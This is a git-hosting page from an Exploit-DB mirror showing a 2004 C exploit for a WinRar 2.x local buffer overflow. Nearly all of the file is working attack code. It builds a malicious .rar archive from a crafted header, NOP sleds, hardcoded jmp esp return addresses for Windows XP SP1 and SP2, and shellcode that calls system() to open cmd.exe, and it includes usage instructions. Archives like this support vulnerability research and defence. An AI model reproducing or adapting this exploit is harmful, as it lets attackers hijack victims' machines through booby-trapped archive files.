bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/558.c
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

119 lines
No EOL
3.1 KiB
C
Raw Blame History

/*
* WinRar local buffer overflow exploit V1.0
* Coded By ATmaCA
* Copyright © 2004 ProGroup Software, Inc.
* E-Mail:atmaca@prohack.net
* Web:www.prohack.net
* Usage:\r\nexploit <Target> <OutputPath>
* Targets:
* 1 - WinXP SP1 user32.dll [0x77D718FC]
* 2 - WinXP SP2 user32.dll [0x77D8AF0A]
* Example:exploit 1 myrar.rar
*/
/*
* All WinRar 2.x series are effected
* 3.x series not effected
* If you want to test and you do not have WinRar V2.x
* You can download it from http://atmaca.prorat.net/Src/winrar.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90
/*crafted rar header*/
char winrar_header[] =
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00\x00"
"\x00\x00\x00\x00\x4A\x91\x74\x80\x80\x35\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x02\x00\x00\x00\x00\x12";
/*launch a local cmd.exe*/
char shellcode[]=
"\x68" // push
"cmd " // cmd
"\x8B\xC4" // mov eax,esp
"\x50" // push eax
"\xB8\xc7\x93\xC2\x77" // mov eax,77C293C7 (address of system() on WinXP SP2
- msvcrt.dll)
"\xFF\xD0" // call eax
;
char *target[]= //return addr
{
"\xFC\x18\xD7\x77", //User32 jmp esp addr WinXp Sp1
"\x0A\xAF\xD8\x77" //User32 jmp esp addr WinXp Sp2
};
char *sysadrr[]=
{
"\x44\x80\xC2\x77", //77C28044 XP Sp1 msvcrt.dll system()
"\xC7\x93\xC2\x77" //77C293C7 XP Sp2 msvcrt.dll system()
};
FILE *di;
int targetnum;
int i;
void main(int argc, char *argv[])
{
if (argc < 3)
{
printf("\r\nWinRar local buffer overflow exploit V1.0\r\n",
argv[0]);
printf("Coded By ATmaCA\r\n");
printf("Copyright © 2004 ProGroup Software, Inc.\r\n");
printf("E-Mail:atmaca@prohack.net\r\n");
printf("Web:www.prohack.net\r\n\r\n");
printf("Usage:\r\nexploit <Target>
<OutputPath>\r\n\r\n",argv[0]);
printf("Targets:\n");
printf("1 - WinXP SP1 english user32.dll [0x77D718FC]\n");
printf("2 - WinXP SP2 english user32.dll [0x77D8AF0A]\n");
printf("Example:exploit 1 myrar.rar\n");
return;
}
targetnum = atoi(argv[1]) - 1;
if( (di=fopen(argv[2],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;i<sizeof(winrar_header)-1;i++)
fputc(winrar_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<1051;i++)
fputc(NOP,di);
fprintf(di,"%s",target[targetnum]); //EIP
for(i=0;i<50;i++) //NOPs
fputc(NOP,di);
memcpy(shellcode+9,sysadrr[targetnum],4); //system() addr
/*Overwriting the return address (EIP) with JMP ESP address
located somewhere in process space */
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],di);
for(i=0;i<50;i++) //NOPs
fputc(NOP,di);
printf("Exploit rar file %s has been generated!\n",argv[2]);
fclose(di);
}
// milw0rm.com [2004-09-28]
Reference in a new issue View git blame Copy permalink